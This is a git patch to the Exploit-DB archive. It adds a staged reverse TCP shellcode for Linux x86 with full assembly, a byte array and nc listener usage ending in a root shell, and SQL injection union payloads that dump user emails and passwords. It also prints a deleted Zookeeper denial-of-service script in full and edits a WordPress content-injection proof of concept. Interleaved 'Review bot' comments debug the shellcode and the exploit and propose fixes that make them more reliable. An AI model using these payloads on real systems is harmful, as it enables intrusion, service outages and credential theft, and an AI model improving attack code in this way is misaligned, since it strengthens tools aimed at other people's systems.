From d1a0e8f9fdc9b5ef102abe1eab9f33e2aa6c92cc Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Thu, 9 Feb 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-02-09 3 new exploits Zookeeper 3.5.2 - Denial of Service Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes) YapBB 1.2 - (forumID) Blind SQL Injection YapBB 1.2 - 'forumID' Parameter Blind SQL Injection ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD ClearBudget 0.6.1 - Insecure Database Download phpYabs 0.1.2 - (Azione) Remote File Inclusion phpYabs 0.1.2 - 'Azione' Parameter Remote File Inclusion IF-CMS 2.0 - 'frame.php id' Blind SQL Injection IF-CMS 2.0 - 'id' Parameter Blind SQL Injection BusinessSpace 1.2 - 'id' SQL Injection A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection BusinessSpace 1.2 - 'id' Parameter SQL Injection A Better Member-Based ASP Photo Gallery - 'entry' Parameter SQL Injection FlexCMS - (catId) SQL Injection FlexCMS 2.5 - 'catId' Parameter SQL Injection Thyme 1.3 - (export_to) Local File Inclusion Papoo CMS 3.x - (pfadhier) Local File Inclusion q-news 2.0 - Remote Command Execution Potato News 1.0.0 - (user) Local File Inclusion Thyme 1.3 - 'export_to' Parameter Local File Inclusion Papoo CMS 3.x - 'pfadhier' Parameter Local File Inclusion Q-News 2.0 - Remote Command Execution Potato News 1.0.0 - Local File Inclusion Mynews 0_10 - Authentication Bypass Mynews 0.10 - Authentication Bypass Muviko Video CMS - SQL Injection Multi Outlets POS 3.1 - 'id' Parameter SQL Injection --- files.csv | 28 ++-- platforms/lin_x86/shellcode/41282.nasm | 198 +++++++++++++++++++++++++ platforms/linux/dos/41277.py | 86 ----------- platforms/linux/webapps/41223.py | 21 +-- platforms/php/webapps/41279.txt | 21 +++ platforms/php/webapps/41280.txt | 18 +++ 6 files changed, 257 insertions(+), 115 deletions(-) create mode 100755 platforms/lin_x86/shellcode/41282.nasm delete mode 100755 platforms/linux/dos/41277.py create mode 100755 platforms/php/webapps/41279.txt create mode 100755 platforms/php/webapps/41280.txt 
diff --git a/files.csv b/files.csv
index f0dc45538..867869a7e 100644
--- a/files.csv
+++ b/files.csv
@@ -5359,7 +5359,6 @@ id,file,description,date,author,platform,type,port
 41219,platforms/hardware/dos/41219.txt,"QNAP NVR/NAS - Buffer Overflow",2017-02-01,bashis,hardware,dos,0
 41222,platforms/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",windows,dos,0
 41232,platforms/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",android,dos,0
-41277,platforms/linux/dos/41277.py,"Zookeeper 3.5.2 - Denial of Service",2017-02-07,"Brandon Dennis",linux,dos,0
 41278,platforms/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,openbsd,dos,80
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
@@ -15876,6 +15875,7 @@ id,file,description,date,author,platform,type,port
 41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
 41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
 41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
+41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -20682,12 +20682,12 @@ id,file,description,date,author,platform,type,port
 7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - 'bbcode.php l' Local File Inclusion",2009-02-04,Osirys,php,webapps,0
 7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0
 7982,platforms/asp/webapps/7982.txt,"team 1.x - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0
-7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - (forumID) Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0
+7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - 'forumID' Parameter Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0
 7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass",2009-02-04,JosS,php,webapps,0
 7991,platforms/asp/webapps/7991.txt,"GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps,0
 7992,platforms/php/webapps/7992.txt,"ClearBudget 0.6.1 - Insecure Cookie Handling / Local File Inclusion",2009-02-05,SirGod,php,webapps,0
 7993,platforms/php/webapps/7993.txt,"Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure",2009-02-05,RoMaNcYxHaCkEr,php,webapps,0
-7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD",2009-02-05,Room-Hacker,php,webapps,0
+7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - Insecure Database Download",2009-02-05,Room-Hacker,php,webapps,0
 7997,platforms/php/webapps/7997.htm,"txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0
 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0
 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0
@@ -20696,29 +20696,29 @@ id,file,description,date,author,platform,type,port
 8002,platforms/php/webapps/8002.txt,"CafeEngine - 'catid' Parameter SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0
 8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-06,JosS,php,webapps,0
 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps,0
-8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0
+8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - 'Azione' Parameter Remote File Inclusion",2009-02-06,Arka69,php,webapps,0
 8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Arbitrary File Upload",2009-02-09,fantastic,php,webapps,0
-8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - 'frame.php id' Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0
+8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - 'id' Parameter Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0
 8009,platforms/php/webapps/8009.pl,"w3bcms 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0
-8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' SQL Injection",2009-02-09,K-159,php,webapps,0
-8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection",2009-02-09,BackDoor,php,webapps,0
+8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' Parameter SQL Injection",2009-02-09,K-159,php,webapps,0
+8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' Parameter SQL Injection",2009-02-09,BackDoor,php,webapps,0
 8014,platforms/php/webapps/8014.pl,"PHP Director 0.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0
 8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS 1.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0
 8016,platforms/php/webapps/8016.txt,"AdaptCMS Lite 1.4 - Cross-Site Scripting / Remote File Inclusion",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0
 8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - Remote File Inclusion / Cross-Site Scripting",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0
-8018,platforms/php/webapps/8018.txt,"FlexCMS - (catId) SQL Injection",2009-02-09,MisterRichard,php,webapps,0
+8018,platforms/php/webapps/8018.txt,"FlexCMS 2.5 - 'catId' Parameter SQL Injection",2009-02-09,MisterRichard,php,webapps,0
 8019,platforms/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 (09.01.22) - Cross-Site Scripting",2009-02-09,make0day,php,webapps,0
 8020,platforms/php/webapps/8020.txt,"Yet Another NOCC 0.1.0 - Local File Inclusion",2009-02-09,Kacper,php,webapps,0
 8025,platforms/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusion",2009-02-09,ahmadbady,php,webapps,0
 8026,platforms/php/webapps/8026.txt,"WB News 2.1.1 - config[installdir] Remote File Inclusion",2009-02-09,ahmadbady,php,webapps,0
 8027,platforms/php/webapps/8027.txt,"Gaeste 1.6 - 'gastbuch.php' Remote File Disclosure",2009-02-09,bd0rk,php,webapps,0
 8028,platforms/php/webapps/8028.pl,"Hedgehog-CMS 1.21 - Local File Inclusion / Remote Command Execution",2009-02-09,Osirys,php,webapps,0
-8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - (export_to) Local File Inclusion",2009-02-10,cheverok,php,webapps,0
-8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - (pfadhier) Local File Inclusion",2009-02-10,SirGod,php,webapps,0
-8031,platforms/php/webapps/8031.pph,"q-news 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0
-8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - (user) Local File Inclusion",2009-02-10,x0r,php,webapps,0
+8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - 'export_to' Parameter Local File Inclusion",2009-02-10,cheverok,php,webapps,0
+8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - 'pfadhier' Parameter Local File Inclusion",2009-02-10,SirGod,php,webapps,0
+8031,platforms/php/webapps/8031.pph,"Q-News 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0
+8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - Local File Inclusion",2009-02-10,x0r,php,webapps,0
 8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
-8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
+8034,platforms/php/webapps/8034.txt,"Mynews 0.10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
 8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - Authentication Bypass",2009-02-10,x0r,php,webapps,0
 8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution",2009-02-10,Osirys,php,webapps,0
 8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure",2009-02-10,Lolek,php,webapps,0
@@ -37201,3 +37201,5 @@ id,file,description,date,author,platform,type,port
 41270,platforms/php/webapps/41270.txt,"FTP Made Easy PRO 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps,0
 41271,platforms/php/webapps/41271.txt,"Easy File Uploader 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps,0
 41272,platforms/php/webapps/41272.txt,"Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure",2017-02-07,"Wiswat Aswamenakul",php,webapps,0
+41279,platforms/php/webapps/41279.txt,"Muviko Video CMS - SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps,0
+41280,platforms/php/webapps/41280.txt,"Multi Outlets POS 3.1 - 'id' Parameter SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/lin_x86/shellcode/41282.nasm b/platforms/lin_x86/shellcode/41282.nasm
new file mode 100755
index 000000000..e44124147
--- /dev/null
+++ b/platforms/lin_x86/shellcode/41282.nasm
@@ -0,0 +1,198 @@
+########### Reverse TCP Staged Alphanumeric Shellcode Linux x86 Execve /bin/sh ########
+ ########### Author: Snir Levi, Applitects #############
+ ## 103 Bytes ##
+
+date: 9.2.17
+Automatic python shellcode handler (with stage preset send) will be ready soon:
+https://github.com/snir-levi/Reverse_TCP_Alphanumeric_Staged_Shellcode_Execve-bin-bash/
+
+
+IP - 127.0.0.1
+PORT - 4444
+
+#### Stage Alphanumeric shellcode: #####
+Stage 1:
+dup2 stdin syscall:
+
+WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
+
+W push edi
+X pop eax
+W push edi
+[ pop ebx
+j? push 0x3f
+X pop eax
+V push esi
+[ pop ebx
+W push edi
+Y pop ecx
+P push eax
+X pop eax
+P push eax
+X pop EAX
+
+Stage 2:
+dup2 stdout syscall:
+
+WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX
+
+W push edi
+X pop eax
+W push edi
+[ pop ebx
+j? push 0x3f
+X pop eax
+V push esi
+[ pop ebx
+W push edi
+Y pop ecx
+A inc ecx (ecx =1)
+P push eax
+X pop eax
+P push eax
+
+Stage 3:
+dup2 stderr syscall:
+
+WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
+
+W push edi
+X pop eax
+W push edi
+[ pop ebx
+j? push 0x3f
+X pop eax
+V push esi
+[ pop ebx
+W push edi
+Y pop ecx
+A*2 inc ecx (ecx = 2)
+P push eax
+X pop eax
+A inc ecx
+
+Stage 3:
+execve /bin/sh:
+
+j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[
+
+j0 push 0x30
+X pop eax
+H*32 dec eax //eax = 0x0b
+W push edi
+Y pop ecx
+W push edi
+Z pop edx
+W push edi // null terminator
+h//sh push 0x68732f2f //sh
+h/bin push 0x6e69622f /bin
+T push esp
+[ pop ebx
+
+Usage: Victim Executes the shellcode, and opens tcp connection
+
+Stage:
+ After Connection is established, send the 4 stages ***separately***
+
+ nc -lvp 4444
+ connect to [127.0.0.1] from localhost [127.0.0.1] (port)
+ WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
+ WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX
+ WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
+ j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[
+
+ whoami
+ root
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+
+
+global _start
+
+
+_start:
+
+ ; sock = socket(AF_INET, SOCK_STREAM, 0)
+ ; AF_INET = 2
+ ; SOCK_STREAM = 1
+ ; syscall number 102 - socketcall
+ ; socket = 0x01
+
+ xor eax,eax
+ xor esi,esi
+ push eax
+ pop edi
+ push eax
+ mov al, 0x66
+ push byte 0x1
+ pop ebx
+ push byte ebx
+ push byte 0x2
+ mov ecx, esp
+ int 0x80
+
+ xchg esi, eax; save sock result
+
+ ; server.sin_family = AF_INET
+ ; server.sin_port = htons(PORT)
+ ; server.sin_addr.s_addr = inet_addr("127.0.0.1")
+
+ push byte 0x1
+ pop edx
+ shl edx, 24
+ mov dl, 0x7f ;edx = 127.0.0.1 (hex)
+ push edx
+ push word 0x5c11 ;port 4444
+ push word 0x02
+
+ ; connect(sock, (struct sockaddr *)&server, sockaddr_len)
+
+ mov al, 0x66
+ mov bl, 0x3
+ mov ecx, esp
+ push byte 0x10
+ push ecx
+ push esi
+ mov ecx ,esp
+ int 0x80
+
+
+stageAddress: ;saves stage address to edx
+ mov edx, [esp]
+ sub bl,3
+ jnz stage
+
+call near stageAddress
+
+ ;recv(int sockfd, void *buf, size_t len, int flags);
+
+stage:
+ mov al, 0x66
+ mov bl, 10
+ push edi
+ push word 100 ; buffer size
+ push edi
+ push esi ; socketfd
+ mov [esp+4],esp ; sets esp as recv buffer
+ mov ecx,esp
+ int 0x80
+ mov al, 0xcd
+ mov ah, 0x80 ; eax = int 0x80
+ mov bl, 0xFF
+ mov bh, 0xE2 ; ebx = jmp edx
+ mov [esp+57],al
+ mov [esp+58],ah
+ mov [esp+59], ebx ;the end of the buffer contains the syscall command int 0x80 and jmp back to stage
+ jmp esp
+
+
+
+unsigned char[] = "\x31\xc0\x31\xf6\x50\x5f\x50\xb0\x66\x6a\x01\x5b\x53\x6a
+\x02\x89\xe1\xcd\x80\x96\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52
+\x66\x68\x11\x5c\x66\x6a\x02\xb0\x66\xb3\x03\x89\xe1\x6a\x10\x51\x56\x89\xe1
+\xcd\x80\x8b\x14\x24\x80\xeb\x03\x75\x05\xe8\xf3\xff\xff\xff
+\xb0\x66\xb3\x0a\x57\x66\x6a\x64\x57\x56\x89\x64\x24\x04\x89\xe1\xcd\x80\xb0
+\xcd\xb4\x80\xb3\xff\xb7\xe2\x88\x44\x24\x39\x88\x64\x24\x3a
+\x89\x5c\x24\x3b\xff\xe4"
+
+
diff --git a/platforms/linux/dos/41277.py b/platforms/linux/dos/41277.py
deleted file mode 100755
index f0e58ed68..000000000
--- a/platforms/linux/dos/41277.py
+++ /dev/null
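Review bot: At `stage:` the byte count returned by `recv` is clobbered by `mov al, 0xcd` before anything inspects it, so the handler always plants `int 0x80; jmp edx` at `[esp+57]` and jumps to `esp` no matter how much data arrived: a short read executes whatever stale stack bytes sit between the received data and offset 57, and two stages delivered in one TCP segment lose the second one (TCP has no message boundaries), which is why the usage text has to insist on sending the stages "separately". A guard such as `cmp eax, 57` / `jl stage` before the `mov [esp+57],al` at least refuses to run a short read; a full fix would accumulate into the buffer and treat a zero return as the peer closing rather than loop. Separately, `push byte ebx` is not accepted by NASM (a size override on a register operand); the byte array shows `\x53`, so the listing line should read `push ebx`. Two documentation fixes: the execve stage is labelled `Stage 3:` like the stderr stage and should be `Stage 4:`, and `H*32 dec eax //eax = 0x0b` does not match the arithmetic, since 0x30 to 0x0b is 37 decrements, which is also what makes that stage 3 + 37 + 17 = 57 bytes long, exactly the offset where the `int 0x80` is written.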
@@ -1,86 +0,0 @@ -#!/usr/bin/python - -# Exploit Title: Zookeeper Client Denial Of Service (Port 2181) -# Date: 2/7/2017 -# Exploit Author: Brandon Dennis -# Email: bdennis@mail.hodges.edu -# Software Link: http://zookeeper.apache.org/releases.html#download -# Zookeeper Version: 3.5.2 -# Tested on: Windows 2008 R2, Windows 2012 R2 x64 & x86 -# Description: The wchp command to the ZK port 2181 will gather open internal files by each session/watcher and organize them for the requesting client. -# This command is CPU intensive and will cause a denial of service to the port as well as spike the CPU of the remote machine to 90-100% consistently before any other traffic. -# The average amount of threads uses was 10000 for testing. This should work on all 3.x+ versions of Zookeeper. -# This should effect Linux x86 & x64 as well - - - -import time -import os -import threading -import sys -import socket - -numOfThreads = 1 -exitStr = "n" -stop_threads = False -threads = [] -ipAddress = "192.168.1.5" #Change this -port = 2181 - -def sendCommand(ipAddress, port): - try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((ipAddress, port)) - s.send("wchp\r".encode("utf-8")) - s.recv(1024) - s.send("wchc\r".encode("utf-8")) - s.close() - except: - pass - - -def runCMD(id, stop, ipAddress, port): - while True: - sendCommand(ipAddress, port) - if stop(): - break - return - -def welcomeBanner(): - banner = """ _______ __ _____ _ -|___ | | / / / __ \ | | - / /| |/ / | / \/_ __ __ _ ___| |__ ___ _ __ - / / | \ | | | '__/ _` / __| '_ \ / _ | '__| -./ /__| |\ \ | \__/| | | (_| \__ | | | | __| | -\_____\_| \_/ \____|_| \__,_|___|_| |_|\___|_| - - By: Brandon Dennis - Email: bdennis@mail.hodges.edu - """ - print(banner) - - -welcomeBanner() -numOfThreads = int(input("How many threads do you want to use: ")) -print ("Startin Up Threads...") -for i in range(numOfThreads): - t = threading.Thread(target=runCMD, args=(id, lambda: stop_threads, ipAddress, port)) - 
threads.append(t) - t.start() -print("Threads are now started...") - - -while exitStr != "y": - inpt = input("Do you wish to stop threads(y): ") - - if inpt == "y": - exitStr = "y" - -print("\nStopping Threads...") -stop_threads = True -for thread in threads: - thread.join() - -print("Threads are now stopped...") -sys.exit(0); - diff --git a/platforms/linux/webapps/41223.py b/platforms/linux/webapps/41223.py index a163137cd..7269a4019 100755 --- a/platforms/linux/webapps/41223.py +++ b/platforms/linux/webapps/41223.py @@ -1,14 +1,3 @@ -# Exploit Title: Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC -# Date: 2017-02-02 -# Exploit Author: @leonjza -# Vendor Homepage: https://wordpress.org/ -# Software Link: https://wordpress.org/wordpress-4.7.zip -# Version: Wordpress 4.7.0/4.7.1 -# Tested on: Debian Jessie -# -# PoC gist: https://gist.github.com/leonjza/2244eb15510a0687ed93160c623762ab -# - # 2017 - @leonjza # # Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC @@ -61,7 +50,7 @@ def get_posts(api_base): posts = json.loads(respone.read()) for post in posts: - print(' - Post ID: {}, Title: {}, Url: {}' + print(' - Post ID: {0}, Title: {1}, Url: {2}' .format(post['id'], post['title']['rendered'], post['link'])) @@ -76,11 +65,11 @@ def update_post(api_base, post_id, post_content): req = urllib2.Request(url, data, {'Content-Type': 'application/json'}) response = urllib2.urlopen(req).read() - print('* Post updated. Check it out at {}'.format(json.loads(response)['link'])) + print('* Post updated. Check it out at {0}'.format(json.loads(response)['link'])) def print_usage(): - print('Usage: {} (optional: )'.format(__file__)) + print('Usage: {0} (optional: )'.format(__file__)) if __name__ == '__main__': 
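Review bot: In the `update_post` hunk the `urllib2.urlopen(req).read()` two lines above the changed print has no error handling, so when the target rejects the write (a patched site presumably answers the REST call with an HTTP error status) the script dies with an uncaught `urllib2.HTTPError` traceback, and the `{0}` message this commit fixes is never reached in that case. Catching `HTTPError`, printing `e.code`, and exiting non-zero (the file already uses `sys.exit`) makes the failure legible without changing the success path. `update_post`'s signature and the `url`/`data` setup are above the hunk, outside the visible lines.
```python
    req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
    try:
        response = urllib2.urlopen(req).read()
    except urllib2.HTTPError as e:
        print('* Post update failed: HTTP {0}'.format(e.code))
        sys.exit(1)
    print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))
```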
@@ -98,7 +87,7 @@ if __name__ == '__main__': print('* Discovering API Endpoint') api_url = get_api_url(sys.argv[1]) - print('* API lives at: {}'.format(api_url)) + print('* API lives at: {0}'.format(api_url)) # if we only have a url, show the posts we have have if len(sys.argv) < 3: @@ -108,7 +97,7 @@ if __name__ == '__main__': sys.exit(0) # if we get here, we have what we need to update a post! - print('* Updating post {}'.format(sys.argv[2])) + print('* Updating post {0}'.format(sys.argv[2])) with open(sys.argv[3], 'r') as content: new_content = content.readlines() diff --git a/platforms/php/webapps/41279.txt b/platforms/php/webapps/41279.txt new file mode 100755 index 000000000..089da4571 --- /dev/null +++ b/platforms/php/webapps/41279.txt @@ -0,0 +1,21 @@ +# # # # # +# Exploit Title: Muviko Video CMS Script - SQL Injection +# Google Dork: N/A +# Date: 08.02.2017 +# Vendor Homepage: https://muvikoscript.com/ +# Software Buy: https://codecanyon.net/item/muviko-movie-video-cms/19402086 +# Demo: https://demo.muvikoscript.com/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/search.php?q=[SQL] +# -9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,email,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users-- - +# http://localhost/[PATH]/category.php?id=[SQL] +# -9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,email,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users-- - +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41280.txt b/platforms/php/webapps/41280.txt new file mode 100755 index 000000000..50a70b0ad --- /dev/null +++ b/platforms/php/webapps/41280.txt 
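Review bot: The 41279.txt entry records `# Version: N/A` and names no fix, so a reader cannot tell which Muviko build is affected or whether a current install still is; the tested build (the demo site at the time) belongs in the `# Version:` field. The payloads carry facts the header leaves out and that are worth stating explicitly: the leading `'` in `-9999'+/*!50000union*/...` shows both `search.php?q=` and `category.php?id=` land in a quoted string, so `id` is evidently not cast to an integer, and the 15-column union plus the `users(email,password,name)` names are schema assumptions from the tested build, which should be labelled as such. Nothing in the entry says whether either endpoint needs a session, which decides whether this is an unauthenticated finding; say which was tested. `# Etc...` is not actionable, so either list the other injectable parameters or drop the line.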
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Point of Sales - Multi Outlets POS v3.1 Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.02.2017
+# Vendor Homepage: http://prosoft-apps.com/
+# Software Buy: https://codecanyon.net/item/point-of-sales-multi-outlets-pos/17674742
+# Demo: http://pos.prosoft-apps.com/pos/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/view_invoice?id=[SQL]
+# Etc...
+# # # # #
\ No newline at end of file
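Review bot: The entry gives only `view_invoice?id=[SQL]` with no payload and no observable (error text, timing difference, or a boolean true/false pair), so nothing here lets a reader confirm the injection or reproduce the result; at minimum record the payload that was sent and what the response showed. `# Version: N/A` contradicts the `v3.1` in the title, so put `3.1` in the `# Version:` field. It is also not stated whether `view_invoice` is reachable without logging in, which for a POS back office is the difference between an unauthenticated and an authenticated finding, so say which was tested. `# Etc...` should either list the other affected parameters or be removed.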